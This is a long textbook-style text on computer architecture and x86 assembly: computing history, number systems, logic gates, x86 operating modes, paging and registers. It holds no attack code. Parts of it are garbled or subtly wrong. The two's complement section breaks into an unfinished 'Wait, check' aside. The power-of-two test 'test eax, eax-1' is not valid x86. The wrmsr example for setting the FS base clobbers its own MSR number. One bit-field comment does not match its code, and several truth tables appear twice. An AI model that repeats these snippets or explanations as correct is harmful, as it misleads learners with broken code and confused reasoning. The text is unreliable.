Advanced Assembly Language Programming & Computer Architecture

From Fundamentals to Reverse Engineering and Systems Development

PART I — Foundations of Computer Systems

Chapter 1: Introduction to Computer Architecture

1.1 History of Computing Systems

The evolution of computing systems represents one of humanity's most remarkable technological journeys. From mechanical calculating devices to modern quantum computers, this history provides essential context for understanding why assembly language programming remains relevant today.

The Pre-Electronic Era (Pre-1940s)

The earliest computing devices were mechanical. Charles Babbage's Analytical Engine (1837) conceived the fundamental elements of a modern computer: a store (memory), a mill (CPU), and punched cards for input/output. Ada Lovelace wrote algorithms for this machine, making her the world's first programmer. Herman Hollerith's tabulating machine (1890) used punched cards for the US Census, leading to the formation of IBM.

First Generation: Vacuum Tubes (1940-1956)

The Electronic Numerical Integrator and Computer (ENIAC), completed in 1945, represented a quantum leap. With 17,468 vacuum tubes, it could perform 5,000 additions per second—revolutionary for its time. However, programming required physically rewiring the machine. The Manchester Baby (1948) became the first stored-program computer, implementing the Von Neumann architecture we still use today. UNIVAC I (1951) became the first commercial computer, predicting Eisenhower's 1952 election victory with remarkable accuracy.

Second Generation: Transistors (1956-1963)

The transistor's invention at Bell Labs (1947) transformed computing. Transistors were smaller, more reliable, and generated less heat than vacuum tubes. IBM introduced the 1401 and 7090 mainframes. The first high-level languages emerged—FORTRAN (1957) and COBOL (1959). Assembly language became essential as programmers needed to interface between these new languages and the underlying hardware.

Third Generation: Integrated Circuits (1964-1971)

Jack Kilby and Robert Noyce independently invented the integrated circuit, allowing multiple transistors on a single chip. IBM's System/360 (1964) introduced the concept of a compatible family of computers, all sharing the same instruction set architecture—a principle that would later define x86 compatibility. The PDP-8 (1965) became the first successful minicomputer, priced at an accessible $18,000.

Fourth Generation: Microprocessors (1971-Present)

Intel's 4004 (1971), the first microprocessor, contained 2,300 transistors and ran at 740KHz. The 8080 (1974) powered the Altair 8800, sparking the personal computer revolution. The 8086 (1978) introduced the x86 architecture that dominates desktop computing to this day. Each subsequent generation—286, 386, 486, Pentium, Core—added features while maintaining backward compatibility.

The Modern Era

Today's processors contain billions of transistors. Apple's M1 (2020) demonstrates the power of system-on-chip design, integrating CPU, GPU, memory, and specialized accelerators. Yet the fundamental concepts remain—instructions execute, data moves, and assembly language provides the closest view of this process.

1.2 Von Neumann Architecture

John Von Neumann's 1945 report "First Draft of a Report on the EDVAC" described a architecture that became the foundation of virtually all general-purpose computers.

Core Components

The Von Neumann architecture consists of four main subsystems:

Central Processing Unit (CPU): Executes instructions
Memory Unit: Stores both instructions and data
Input/Output System: Communicates with external devices
Control Unit: Coordinates operations

The Stored-Program Concept

The revolutionary insight was storing both program instructions and data in the same memory space. This allowed:

Self-modifying code (common in early assembly programming)
Programs to be treated as data (enabling compilers and assemblers)
Easy loading of new programs into memory

The Fetch-Decode-Execute Cycle

The Von Neumann architecture operates through a continuous cycle:

Fetch: The CPU retrieves an instruction from memory at the address stored in the Program Counter (PC)
Decode: The Control Unit interprets the instruction
Execute: The ALU or other components perform the required operation
Store: Results are written back to memory or registers

The Von Neumann Bottleneck

The shared bus between CPU and memory creates a fundamental limitation—the "Von Neumann bottleneck." Since instructions and data share the same pathway, throughput is limited by bus bandwidth. This constraint has driven many architectural innovations:

Cache memories (storing frequently used data closer to CPU)
Harvard architecture (separate instruction and data paths)
Superscalar execution (fetching multiple instructions simultaneously)

1.3 Harvard Architecture

The Harvard Mark I, completed in 1944, used physically separate memory for instructions and data. This design offers distinct advantages:

Characteristics

Separate address spaces for instructions and data
Dedicated buses for each memory type
Simultaneous access to instructions and data

Advantages

No Von Neumann bottleneck for instruction fetch
Security benefits (preventing code modification)
Deterministic timing (critical for embedded systems)

Disadvantages

More complex hardware
Wasted memory if spaces are unbalanced
Cannot load new programs easily

1.4 Modified Harvard Architecture

Modern processors typically implement a modified Harvard architecture, which combines features of both designs:

Separate L1 caches for instructions and data
Unified memory at higher levels (L2/L3 cache, main memory)
Special instructions for accessing code as data

This approach gives the performance benefits of Harvard at the cache level while maintaining the flexibility of Von Neumann for main memory. Most ARM Cortex-M processors use modified Harvard, as do x86 processors at the cache level.

1.5 CISC vs RISC

The philosophical divide between Complex Instruction Set Computer (CISC) and Reduced Instruction Set Computer (RISC) architecture has shaped processor design for decades.

CISC Characteristics (x86, 68000)

CISC emerged when memory was expensive and compilers were primitive. Key features include:

Variable instruction length: Instructions can be 1-15 bytes on x86
Complex instructions: Single instructions perform multi-step operations (e.g., REP MOVSB copies entire strings)
Memory-operand instructions: Operations can work directly on memory
Fewer registers: Historical constraints limited register count
Microcode: Complex instructions are implemented as microcode routines

Advantages of CISC:

Dense code (important when memory was expensive)
Backward compatibility (x86 maintains 40+ years of compatibility)
Simpler compilers (instructions map directly to high-level constructs)

RISC Characteristics (ARM, RISC-V, MIPS)

RISC emerged from research at IBM, Stanford, and UC Berkeley in the 1980s, emphasizing simplicity and regularity:

Fixed instruction length: Typically 32 bits
Simple instructions: Each instruction does one thing
Load-store architecture: Only load/store access memory
Many registers: Typically 32 general-purpose registers
Hardwired control: No microcode, faster decoding

Advantages of RISC:

Simpler pipeline design
Easier to achieve high clock speeds
More efficient compiler optimization
Lower power consumption

The Modern Convergence

Modern x86 processors internally convert CISC instructions into RISC-like micro-ops, then execute them on a RISC-style core. ARM added thumb/thumb2 instructions for denser code. The distinction has blurred, but understanding both remains valuable for assembly programmers.

1.6 Modern CPU Overview

A modern CPU represents an astonishing feat of engineering, containing billions of transistors operating at gigahertz frequencies. Understanding its components helps assembly programmers write better code.

Core Components

Arithmetic Logic Unit (ALU): Performs arithmetic and logical operations
- Integer arithmetic (ADD, SUB, MUL, DIV)
- Bitwise operations (AND, OR, XOR, NOT)
- Shift and rotate operations
Floating Point Unit (FPU): Handles floating-point calculations
- IEEE 754 compliance
- SIMD/vector extensions for parallel floating-point
Control Unit: Coordinates instruction execution
- Instruction fetch and decode
- Branch prediction
- Exception handling
Cache Hierarchy: Multi-level memory caching
- L1: Fastest, smallest (32KB typical), split instruction/data
- L2: Larger (256KB-1MB), unified
- L3: Shared among cores (several MB)
- L4: Optional, eDRAM or similar
Memory Management Unit (MMU): Handles virtual-to-physical address translation
- Page table walking
- TLB (Translation Lookaside Buffer) caching
Register File: Fastest storage, directly accessible
- General-purpose registers
- Control/status registers
- Vector registers (for SIMD)

Superscalar Components

Modern processors can execute multiple instructions per cycle:

Multiple execution units: Several ALUs, FPUs, load/store units
Out-of-order execution: Reorder instructions for better throughput
Register renaming: Eliminate false dependencies
Speculative execution: Execute branches before they're resolved

1.7 Role of Assembly in Modern Systems

With high-level languages dominating modern development, one might question assembly's relevance. However, assembly language programming remains crucial for several domains:

Performance-Critical Code

Game engines: Graphics routines, physics calculations
Encryption/decryption: AES, SHA implementations
Signal processing: Audio/video codecs, DSP algorithms
HPC applications: Mathematical libraries (BLAS, LAPACK)

System Programming

Operating systems: Context switching, interrupt handlers, memory management
Device drivers: Direct hardware interaction, MMIO
Bootloaders: Initial system startup before C runtime available
Hypervisors/VMMs: Virtual machine management

Reverse Engineering and Security

Malware analysis: Understanding malicious code behavior
Vulnerability research: Finding and exploiting bugs
Binary patching: Modifying compiled programs
Digital rights management: Bypassing protection mechanisms

Embedded Systems

Microcontrollers: Small devices with limited resources
Firmware: BIOS/UEFI, router firmware, IoT devices
Real-time systems: Guaranteed timing constraints

Compiler Development

Code generation: Understanding target architecture
Optimization: Recognizing pattern opportunities
Debugging: Analyzing compiler output

Education and Understanding

Computer architecture: Deep understanding of how computers work
Debugging skills: Reading disassembled code when debugging
Security awareness: Understanding exploitation techniques

When Assembly Is Appropriate

When performance is absolutely critical
When hardware access is required
When no compiler exists for the target
When reverse engineering existing code
When size constraints are extreme (boot sectors)

When Assembly Is Not Appropriate

Most application development
When portability matters
When development speed is priority
When maintenance cost must be minimized

Chapter 2: Number Systems & Data Representation

2.1 Binary, Octal, Decimal, Hexadecimal

Understanding number systems is fundamental to assembly programming, as computers ultimately work with binary representations.

Binary (Base-2)

Computers use binary because transistors have two stable states: on (1) and off (0). Each binary digit (bit) represents a power of 2:

Binary: 10110110
Value:  1×2⁷ + 0×2⁶ + 1×2⁵ + 1×2⁴ + 0×2³ + 1×2² + 1×2¹ + 0×2⁰
       = 128 + 0 + 32 + 16 + 0 + 4 + 2 + 0
       = 182 decimal

Common bit groupings:

Nibble: 4 bits (one hex digit)
Byte: 8 bits (fundamental addressable unit)
Word: 16 bits (historical x86 word size)
DWORD: 32 bits (double word)
QWORD: 64 bits (quad word)

Octal (Base-8)

Octal was popular in early computing (PDP-8, UNIX permissions) because 3 bits group neatly:

Octal: 266
Binary: 010 110 110 (3 bits per digit)
Value:  2×8² + 6×8¹ + 6×8⁰ = 128 + 48 + 6 = 182 decimal

Decimal (Base-10)

Human-familiar system but problematic for computers because:

10 is not a power of 2
Some decimal numbers have infinite binary representations (0.1)
Binary-coded decimal (BCD) was developed to address this

Hexadecimal (Base-16)

The most common system in assembly programming because 4 bits fit perfectly:

Hex: B6
Binary: 1011 0110
Value:  B×16¹ + 6×16⁰ = 11×16 + 6 = 176 + 6 = 182 decimal

Conversion Between Bases

Converting between binary and hex is straightforward due to the 4-bit grouping:

Binary:  1011 0110 1111 0001
         B    6    F    1
Hex:     B6F1

Converting decimal to binary involves repeated division:

182 ÷ 2 = 91 remainder 0 (LSB)
91 ÷ 2 = 45 remainder 1
45 ÷ 2 = 22 remainder 1
22 ÷ 2 = 11 remainder 0
11 ÷ 2 = 5 remainder 1
5 ÷ 2 = 2 remainder 1
2 ÷ 2 = 1 remainder 0
1 ÷ 2 = 0 remainder 1 (MSB)

Read remainders from bottom up: 10110110

2.2 Signed & Unsigned Integers

The same binary pattern can represent different values depending on interpretation.

Unsigned Integers

All bits contribute to magnitude. Range for n bits: 0 to 2ⁿ-1

8-bit unsigned: 00000000 to 11111111 (0 to 255)
16-bit unsigned: 0 to 65535
32-bit unsigned: 0 to 4,294,967,295
64-bit unsigned: 0 to 18,446,744,073,709,551,615

Signed Magnitude

The simplest signed representation (rarely used):

MSB represents sign (0=positive, 1=negative)
Remaining bits represent magnitude
Problem: Two representations for zero (+0 and -0)

+42: 00101010
-42: 10101010

One's Complement

Negatives are bitwise NOT of positives:

Still has two zeros (+0=00000000, -0=11111111)
Arithmetic requires end-around carry
Used in some early computers (CDC 6600)

+42: 00101010
-42: 11010101

2.3 Two's Complement

The universal signed integer representation in modern computers. Negatives are formed by inverting all bits and adding 1.

Formation Rule:

-N = ~N + 1

Examples with 8 bits:

+42: 00101010
-42: 11010110 (invert: 11010101, add 1: 11010110)

+127: 01111111
-128: 10000000 (invert: 10000000, add 1: 10000001? Wait, check)
Actually: +128 would be 10000000, but -128 is 10000000

Advantages of Two's Complement:

Single representation for zero
Addition/subtraction same for signed/unsigned
Automatic modulo arithmetic
Symmetric range except for most negative value

Range: -2ⁿ⁻¹ to 2ⁿ⁻¹-1

8-bit: -128 to 127
16-bit: -32,768 to 32,767
32-bit: -2,147,483,648 to 2,147,483,647

Sign Extension

Extending a signed number to more bits preserves value:

8-bit -42: 11010110
16-bit -42: 11111111 11010110 (copy sign bit to new high bits)

2.4 Floating Point (IEEE 754)

Real numbers require floating-point representation. IEEE 754 is the universal standard.

Scientific Notation Review

Decimal scientific notation: 1.234 × 10³ = 1234 Binary scientific notation: 1.011 × 2³ = 1011₂ = 11₁₀

IEEE 754 Single Precision (32-bit)

Bits: SEEEEEEE EMMMMMMM MMMMMMMM MMMMMMMM
Where:
S = Sign bit (1 bit)
E = Exponent (8 bits)
M = Mantissa/Significand (23 bits)

Components:

Sign bit: 0 for positive, 1 for negative
Biased exponent: Actual exponent + 127 bias
Normalized mantissa: Leading 1 is implicit (except special cases)

Value Formula:

(-1)ˢ × 1.M × 2⁽ᴱ⁻¹²⁷⁾

Special Values:

Zero: E=0, M=0 (±0 exists)
Denormalized: E=0, M≠0 (gradual underflow)
Infinity: E=255, M=0 (±∞)
NaN: E=255, M≠0 (Not a Number)

Example: Representing 42.0

Convert to binary: 42 = 32 + 8 + 2 = 101010₂
Normalize: 101010 = 1.01010 × 2⁵
Bias exponent: 5 + 127 = 132 = 10000100₂
Mantissa: 01010 (implicit leading 1)
Sign: 0 (positive)

Result: 0 10000100 01010000000000000000000

Double Precision (64-bit)

Sign: 1 bit
Exponent: 11 bits (bias 1023)
Mantissa: 52 bits
Range: ±10⁻³⁰⁸ to ±10³⁰⁸

Precision Limitations

Floating-point numbers are approximations:

0.1 in binary is repeating: 0.0001100110011...
Some operations lose precision
Comparison requires epsilon tolerance

2.5 Endianness

Endianness describes byte ordering in multi-byte values.

Big-Endian

Most significant byte stored at lowest address (network byte order):

Memory address: [0] [1] [2] [3] Value 0x12345678: 0x12 0x34 0x56 0x78

Used by: network protocols, PowerPC, SPARC, 68000

Little-Endian

Least significant byte stored at lowest address:

Memory address: [0] [1] [2] [3] Value 0x12345678: 0x78 0x56 0x34 0x12

Used by: x86, x86-64, most ARM systems

Bi-Endian

Some architectures (ARM, MIPS) can switch endianness.

Implications for Assembly Programmers

Multi-byte values read/written differently
Network data requires byte swapping
Type punning through unions/pointers affected
Debugger memory dumps show reversed bytes on little-endian

Example in x86 Assembly:

; Storing 0x12345678 to memory
mov eax, 0x12345678
mov [mem], eax

; Memory now contains: 78 56 34 12
; To read as network order, need:
bswap eax  ; byte swap instruction

2.6 Character Encoding (ASCII, UTF-8, UTF-16)

ASCII (American Standard Code for Information Interchange)

7-bit encoding (0-127) covering English letters, digits, punctuation, and control characters:

0x41: 'A'
0x61: 'a'
0x30: '0'
0x20: Space
0x0D: Carriage Return
0x0A: Line Feed

Extended ASCII (8-bit) added characters 128-255, but varies by code page.

Unicode

Universal character set supporting all world scripts. Several encoding forms:

UTF-8

Variable-length: 1-4 bytes per character
ASCII characters use 1 byte (compatible with ASCII)
Self-synchronizing (can find character boundaries)
Dominant on web (over 95% of pages)

Encoding pattern:

0xxxxxxx                    (ASCII, 0-127)
110xxxxx 10xxxxxx            (2 bytes, 128-2047)
1110xxxx 10xxxxxx 10xxxxxx   (3 bytes, 2048-65535)
11110xxx 10xxxxxx 10xxxxxx 10xxxxxx (4 bytes, 65536+)

UTF-16

Variable-length: 2 or 4 bytes
Most common characters use 2 bytes
Used internally by Windows, Java, .NET
Surrogate pairs for characters beyond 65535

UTF-32

Fixed 4-byte characters
Simple but inefficient
Rarely used except internally

2.7 Bitwise Operations & Logic

Bitwise operations are fundamental to assembly programming.

AND (&)

Truth table: 1&1=1, 1&0=0, 0&1=0, 0&0=0 Use: Masking bits, clearing bits

and eax, 0x0F   ; keep only low 4 bits
and eax, ebx    ; bitwise AND

OR (|)

Truth table: 1|1=1, 1|0=1, 0|1=1, 0|0=0 Use: Setting bits

or eax, 0x80    ; set bit 7
or eax, ebx     ; bitwise OR

XOR (^)

Truth table: 1^1=0, 1^0=1, 0^1=1, 0^0=0 Use: Toggling bits, clearing registers

xor eax, eax    ; zero register (faster than mov eax,0)
xor eax, 0xFF   ; toggle low 8 bits

NOT (~)

Truth table: ~1=0, ~0=1 Use: Bitwise complement

not eax         ; invert all bits

Common Bit Manipulations

Test if bit n is set:

test eax, 1<<n  ; AND without storing result
jnz bit_set

Set bit n:

or eax, 1<<n

Clear bit n:

and eax, ~(1<<n)

Toggle bit n:

xor eax, 1<<n

Extract bit field:

; Extract bits 8-15 into low byte
mov ebx, eax
shr ebx, 8
and ebx, 0xFF

Combine bit fields:

; Combine high byte of ax with low byte of bx
and eax, 0xFFFF00FF   ; clear bits 8-15
and ebx, 0x0000FF00   ; isolate bits 8-15 of bx
or eax, ebx           ; combine

Bitwise Tricks

Swap without temporary:

xor eax, ebx
xor ebx, eax
xor eax, ebx

Check power of two:

test eax, eax-1
jz power_of_two       ; zero if power of two (and non-zero)

Count set bits (population count):

; Modern x86 has POPCNT instruction
popcnt eax, eax

Chapter 3: Digital Logic Fundamentals

3.1 Logic Gates

Logic gates are the building blocks of digital circuits. Understanding them helps assembly programmers appreciate what's happening at the lowest level.

Basic Gates

AND Gate

Output HIGH only when ALL inputs HIGH
Symbol: D-shaped symbol
Truth table (2-input):

A B Q

0 0 0

0 1 0

1 0 0

1 1 1

A	B	Q
0	0	0
0	1	0
1	0	0
1	1	1

OR Gate

Output HIGH when ANY input HIGH
Symbol: Curved input, pointed output
Truth table:

A B Q

0 0 0

0 1 1

1 0 1

1 1 1

A	B	Q
0	0	0
0	1	1
1	0	1
1	1	1

NOT Gate (Inverter)

Output opposite of input
Symbol: Triangle with bubble
Truth table:

A Q

0 1

1 0

A	Q
0	1
1	0

NAND Gate

AND followed by NOT
Universal gate (can build any circuit)
Symbol: AND with bubble

NOR Gate

OR followed by NOT
Also universal

XOR Gate

Output HIGH when inputs differ
Symbol: OR with additional line
Truth table:

A B Q

0 0 0

0 1 1

1 0 1

1 1 0

A	B	Q
0	0	0
0	1	1
1	0	1
1	1	0

XNOR Gate

Output HIGH when inputs same
XOR followed by NOT

Gate Delay

Real gates have propagation delay (typically picoseconds to nanoseconds), which affects maximum clock speed and can cause race conditions.

3.2 Boolean Algebra

Boolean algebra provides mathematical tools for analyzing and simplifying digital circuits.

Laws and Identities

Identity Laws:

A + 0 = A
A · 1 = A
A + 1 = 1
A · 0 = 0

Idempotent Laws:

A + A = A
A · A = A

Complement Laws:

A + A' = 1
A · A' = 0

Involution Law:

(A')' = A

Commutative Laws:

A + B = B + A
A · B = B · A

Associative Laws:

(A + B) + C = A + (B + C)
(A · B) · C = A · (B · C)

Distributive Laws:

A · (B + C) = A·B + A·C
A + (B·C) = (A+B) · (A+C)

DeMorgan's Theorems:

(A + B)' = A' · B'
(A · B)' = A' + B'

Karnaugh Maps

Graphical method for simplifying Boolean expressions with up to 6 variables:

2-variable K-map:
     B
     0   1
A 0 |   |
  1 |   |

Example: Simplify A'B + AB'

K-map shows this is XOR

3.3 Flip-Flops & Registers

Flip-flops are sequential logic elements that store state.

SR Latch (Set-Reset)

Basic bistable element:

S=1, R=0: Set Q=1
S=0, R=1: Reset Q=0
S=0, R=0: Hold state
S=1, R=1: Invalid (race condition)

D Flip-Flop

Data flip-flop captures input on clock edge:

Truth table (positive edge-triggered):
Clock  D  Q(next)
  ↑    0   0
  ↑    1   1
  otherwise Q unchanged

JK Flip-Flop

More versatile, eliminates invalid state:

J=1, K=0: Set
J=0, K=1: Reset
J=1, K=1: Toggle
J=0, K=0: Hold

Registers

Multiple D flip-flops sharing common clock form a register:

8-bit register:
        D0 D1 D2 D3 D4 D5 D6 D7
        |  |  |  |  |  |  |  |
Clock---|--|--|--|--|--|--|--|--
        Q0 Q1 Q2 Q3 Q4 Q5 Q6 Q7

Register Transfer Level (RTL)

Registers connected by combinational logic form the basis of CPU design. Assembly instructions correspond to RTL operations:

mov eax, ebx    ; RTL: EAX ← EBX
add eax, ecx    ; RTL: EAX ← EAX + ECX

3.4 Adders & ALUs

Half Adder

Adds two bits, produces sum and carry:

Sum = A XOR B
Carry = A AND B

Truth table:
A B | Sum Carry
0 0 | 0   0
0 1 | 1   0
1 0 | 1   0
1 1 | 0   1

Full Adder

Adds three bits (two inputs plus carry-in):

Sum = (A XOR B) XOR Cin
Cout = (A AND B) OR (Cin AND (A XOR B))

Truth table:
A B Cin | Sum Cout
0 0 0   | 0   0
0 0 1   | 1   0
0 1 0   | 1   0
0 1 1   | 0   1
1 0 0   | 1   0
1 0 1   | 0   1
1 1 0   | 0   1
1 1 1   | 1   1

Ripple-Carry Adder

Chain full adders for multi-bit addition:

A3 B3    A2 B2    A1 B1    A0 B0
|  |     |  |     |  |     |  |
FA3-----FA2-----FA1-----FA0--Cin
|        |        |        |
Cout    S3       S2       S1       S0

Carry Look-Ahead Adder

Faster than ripple-carry by precomputing carries:

Generate: Gi = Ai AND Bi
Propagate: Pi = Ai XOR Bi
Carry: Ci+1 = Gi OR (Pi AND Ci)

Arithmetic Logic Unit (ALU)

ALU combines multiple operations with selection:

Control lines select function:
000: A AND B
001: A OR B
010: A + B
011: A - B
100: SLT (set if less than)
...

Block diagram:
A[31:0]───┐
          │
B[31:0]───┼───┐
          │   │
Control───┘   │
          ALU │
              │
Result[31:0]──┘
Flags (Zero, Carry, Overflow, Negative)

3.5 Control Units

Control units generate the signals that coordinate CPU operations.

Hardwired Control

Logic gates generate control signals based on instruction:

Fast but complex for large instruction sets
Used in RISC processors
Difficult to modify

Microprogrammed Control

Control signals stored in control store (ROM):

Each instruction triggers microcode routine
Easier to modify (microcode updates)
Used in CISC processors
Slower than hardwired

Microinstruction Format:

| Next Address | Control Signals | ALU Control | ... |

Microinstructions execute in sequence to implement machine instructions:

ADD instruction microcode:
1: MAR ← PC, Read memory, PC ← PC+1
2: IR ← Memory
3: Decode IR
4: A ← Register[IR.Rs]
5: B ← Register[IR.Rt]
6: ALU ← A + B
7: Register[IR.Rd] ← ALU
8: Fetch next instruction

3.6 CPU Execution Cycle

The fundamental operation of a CPU is the fetch-decode-execute cycle.

Fetch Phase

Program Counter (PC) contains address of next instruction
Address placed on address bus
Control signals request memory read
Instruction word returned on data bus
Instruction loaded into Instruction Register (IR)
PC incremented to next instruction

Decode Phase

Instruction Register contents decoded
Control unit identifies operation and operands
Register file addresses extracted
Immediate values sign-extended
Control signals prepared for execute phase

Execute Phase

ALU performs required operation
Memory read/write performed
Register file updated
Flags updated (Zero, Carry, etc.)
PC modified for branches/jumps

Pipeline Stages

Modern CPUs pipeline this cycle:

Cycle	Stage 1	Stage 2	Stage 3	Stage 4	Stage 5
1	Fetch 1
2	Fetch 2	Decode 1
3	Fetch 3	Decode 2	Exec 1
4	Fetch 4	Decode 3	Exec 2	Mem 1
5	Fetch 5	Decode 4	Exec 3	Mem 2	Write 1

Pipeline Hazards

Structural hazards: Resource conflicts
Data hazards: Instruction depends on previous result
Control hazards: Branches change flow

Solutions: stalling, forwarding, branch prediction, speculation

PART II — x86 Architecture Deep Dive

Chapter 4: x86 Architecture Overview

4.1 Evolution from 8086 to x86-64

The x86 architecture's 40+ year history demonstrates remarkable backward compatibility while adding modern features.

8086 (1978)

16-bit architecture
20-bit address bus (1MB addressable)
14 registers: AX, BX, CX, DX, SI, DI, BP, SP, CS, DS, SS, ES, IP, FLAGS
Segment:offset addressing
No protection, no virtual memory
Maximum 1MB RAM

8088 (1979)

Same architecture as 8086
8-bit external data bus (cheaper implementation)
Used in original IBM PC

80286 (1982)

16-bit, 24-bit address (16MB)
Protected mode introduced
Memory protection, but no virtual memory
Backward compatible with real mode

80386 (1985)

32-bit architecture
32-bit registers (EAX, EBX, etc.)
32-bit address bus (4GB)
Paging, virtual memory
Protected mode enhancements
Virtual 8086 mode
Flat memory model possible

80486 (1989)

Integrated FPU (except 486SX)
8KB L1 cache on-chip
Pipeline improvements
Faster instructions

Pentium (1993)

Superscalar (2 instructions per cycle)
64-bit data bus
MMX instructions (1997)
Better FPU

Pentium Pro (1995)

Out-of-order execution
Conditional move instructions
On-package L2 cache

Pentium II (1997)

MMX, out-of-order
Slot 1 cartridge

Pentium III (1999)

SSE (70 new instructions)
Streaming SIMD extensions

Pentium 4 (2000)

NetBurst architecture
Very deep pipeline
SSE2, SSE3
Hyper-Threading (2002)

Core Architecture (2006)

Return to efficient pipeline
64-bit (EM64T)
Multi-core
Virtualization (VT-x)

Core i Series (2008+)

Integrated memory controller
Integrated graphics
Turbo Boost
AES-NI, AVX, AVX2
Ring bus architecture

Modern x86-64

64-bit addressing (theoretically 16EB, practically less)
16 general-purpose registers (RAX, RBX, RCX, RDX, RSI, RDI, RBP, RSP, R8-R15)
RIP-relative addressing
No segmentation in 64-bit mode
Legacy features removed

4.2 Real Mode vs Protected Mode

Real Mode

16-bit mode from 8086
1MB address space (20-bit)
Segmented addressing: physical = segment×16 + offset
No protection between programs
Direct hardware access
Operating system can crash from any program
Used by bootloaders, BIOS

Real mode addressing example:

mov ax, 0x1000    ; segment
mov ds, ax
mov bx, 0x2000    ; offset
mov al, [bx]      ; accesses physical 0x1000×16 + 0x2000 = 0x12000

Protected Mode

Introduced with 286, matured with 386
32-bit addressing (4GB)
Memory protection through segmentation and paging
Privilege levels (rings)
Virtual memory
Multitasking support
Protected from errant programs

Virtual 8086 Mode

Run real-mode programs within protected mode
Each VM86 task has 1MB virtual space
Traps sensitive instructions
Used by Windows 9x for DOS programs

4.3 Long Mode

Long mode is x86-64's 64-bit mode.

Sub-modes

64-bit mode: True 64-bit execution
Compatibility mode: Run 16/32-bit apps under 64-bit OS

Features

64-bit virtual addresses (48/57 bits actually used)
64-bit general purpose registers
8 new registers (R8-R15)
16 XMM registers (vs 8 in 32-bit)
RIP-relative addressing
No segmentation (except FS/GS for thread-local storage)
Flat memory model

Addressing Limitations

Current CPUs use 48-bit virtual addresses (256TB)
4-level paging (48 bits) or 5-level paging (57 bits)
Canonical addresses: bits 63:48 must be sign-extended from bit 47

4.4 CPU Privilege Rings

x86 provides four privilege levels (0-3) called rings:

Ring 0: Kernel (most privileged)
Ring 1: Device drivers (rarely used)
Ring 2: Device drivers (rarely used)
Ring 3: Applications (least privileged)

Ring Transitions

Calls: SYSENTER/SYSEXIT, SYSCALL/SYSRET
Interrupts: Hardware interrupts, software interrupts (INT n)
Exceptions: Page faults, divide errors, etc.

What Each Ring Can Do

Ring 0 can:

Execute privileged instructions (LGDT, MOV to CR0, etc.)
Access all memory
Disable interrupts
Modify page tables

Ring 3 cannot:

Execute privileged instructions (cause #GP fault)
Access kernel memory (unless mapped with user access)
Halt the CPU

4.5 Segmentation

Segmentation divides memory into variable-sized segments.

Segment Selectors

16-bit value in segment register:

Bits 15-3: Index into descriptor table
Bit 2:     Table Indicator (0=GDT, 1=LDT)
Bits 1-0:  Requested Privilege Level (RPL)

Descriptor Tables

GDT (Global Descriptor Table): Shared by all tasks
LDT (Local Descriptor Table): Per-task segments
IDT (Interrupt Descriptor Table): Interrupt handlers

Segment Descriptor (8 bytes):

Byte 0-1: Segment Limit (15:0)
Byte 2-3: Base Address (23:0)
Byte 4:   Access Rights
    Bit 7: Present
    Bits 6-5: Privilege Level (0-3)
    Bit 4: Descriptor Type (1=code/data, 0=system)
    Bit 3: Executable (1=code, 0=data)
    For code: Bit 2: Conforming, Bit 1: Readable
    For data: Bit 2: Direction, Bit 1: Writable
    Bit 0: Accessed
Byte 5:   Flags + Limit (19:16)
    Bits 7-4: Flags (G=granularity, D/B=default size, L=long mode, AVL=available)
    Bits 3-0: Limit (19:16)
Byte 6-7: Base Address (31:24)

Address Translation

Logical address (segment:offset) → Linear address → (optional paging) → Physical

4.6 Paging & Virtual Memory

Paging provides virtual memory, protection, and isolation.

Page Tables

Modern x86 uses 4-level (or 5-level) page tables:

CR3 → PML4 → PDPT → PD → PT → 4KB Page
       9 bits 9 bits 9 bits 9 bits 12 bits offset

Page Table Entry (64-bit)

Bit 0: Present
Bit 1: Read/Write
Bit 2: User/Supervisor
Bit 3: Page-level Write-Through
Bit 4: Page-level Cache Disable
Bit 5: Accessed
Bit 6: Dirty
Bit 7: Page Size (1 for 2MB/1GB pages)
Bit 8: Global
Bits 9-11: Available
Bits 12-51: Physical Address (page-aligned)
Bits 52-62: Available
Bit 63: Execute Disable (NX bit)

Large Pages

2MB pages (PDE with PS=1)
1GB pages (PDPTE with PS=1)

TLB (Translation Lookaside Buffer)

Caches recent page translations:

Small (tens to hundreds of entries)
Very fast (accessed in parallel)
Needs invalidation on page table changes

Paging Benefits

Isolated address spaces
Demand paging (pages loaded on fault)
Shared memory (same physical page mapped multiple times)
Copy-on-write
Memory overcommitment

Chapter 5: Registers and Memory Model

5.1 General Purpose Registers

x86-64 provides 16 general-purpose registers, each 64 bits wide.

Legacy 32-bit Names

64-bit | 32-bit | 16-bit | 8-bit (low) | 8-bit (high)
-------|--------|--------|-------------|------------
RAX    | EAX    | AX     | AL          | AH
RBX    | EBX    | BX     | BL          | BH
RCX    | ECX    | CX     | CL          | CH
RDX    | EDX    | DX     | DL          | DH
RSI    | ESI    | SI     | SIL         | -
RDI    | EDI    | DI     | DIL         | -
RBP    | EBP    | BP     | BPL         | -
RSP    | ESP    | SP     | SPL         | -
R8     | R8D    | R8W    | R8B         | -
R9     | R9D    | R9W    | R9B         | -
R10    | R10D   | R10W   | R10B        | -
R11    | R11D   | R11W   | R11B        | -
R12    | R12D   | R12W   | R12B        | -
R13    | R13D   | R13W   | R13B        | -
R14    | R14D   | R14W   | R14B        | -
R15    | R15D   | R15W   | R15B        | -

Register Purposes (Conventional)

RAX: Accumulator, return value, syscall number
RBX: Base register (callee-saved)
RCX: Counter (loop, shift/rotate count)
RDX: Data register (extended accumulator, I/O)
RSI: Source index (string operations)
RDI: Destination index (string operations)
RBP: Base pointer (frame pointer, callee-saved)
RSP: Stack pointer
R8-R15: General purpose (some syscall args in System V)

5.2 Segment Registers

Segment Registers in 64-bit Mode

Most segmentation is disabled, but FS and GS remain:

CS: Code segment (not used directly)
DS: Data segment (ignored, treated as 0)
SS: Stack segment (ignored, treated as 0)
ES: Extra segment (ignored, treated as 0)
FS: Used for thread-local storage (TEB in Windows, TCB in Linux)
GS: Used for other per-CPU data

FS/GS Base Address

In 64-bit mode, FS and GS have hidden base addresses set via MSRs:

; Set FS base to value in RCX
mov ecx, 0xC0000100   ; MSR_FS_BASE
mov eax, ecx          ; low 32 bits
shr rcx, 32           ; high 32 bits
mov edx, ecx
wrmsr

5.3 Control Registers

Control registers (CR0-CR4, CR8) control processor features.

CR0 (System Control Flags)

Bit 0: PE - Protected Mode Enable
Bit 1: MP - Monitor Coprocessor
Bit 2: EM - Emulate Coprocessor
Bit 3: TS - Task Switched
Bit 4: ET - Extension Type (80386 only)
Bit 5: NE - Numeric Error
Bit 16: WP - Write Protect (supervisor write protection)
Bit 18: AM - Alignment Mask
Bit 29: NW - Not Write-through
Bit 30: CD - Cache Disable
